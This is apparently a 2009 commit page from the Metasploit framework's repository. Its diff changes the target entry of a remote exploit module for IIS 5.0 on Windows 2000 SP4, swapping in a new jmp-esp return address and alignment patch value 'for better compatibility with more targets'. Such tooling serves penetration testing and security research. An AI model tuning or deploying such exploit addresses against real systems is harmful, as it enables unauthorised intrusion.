Updated patch and return address for better compatibility with more targets

git-svn-id: file:///home/svn/framework3/trunk@6992 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-09-01 16:38:52 +00:00
parent 660ae9444b
commit ca22f6fa98
1 changed files with 4 additions and 4 deletions

View File

@ -52,11 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
[
'Windows 2000 SP4 Universal (IIS 5.0)',
'Windows 2000 SP4 English/Italian (IIS 5.0)',
{
'Platform' => 'win',
'Ret' => 0x77f4b19b, # jmp esp from kcope's code
'Patch' => 0x7ffa7ffa, # works for off-by-two alignment
'Ret' => 0x77e3c256, # jmp esp in user32 SP4 EN/IT
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
},
],
],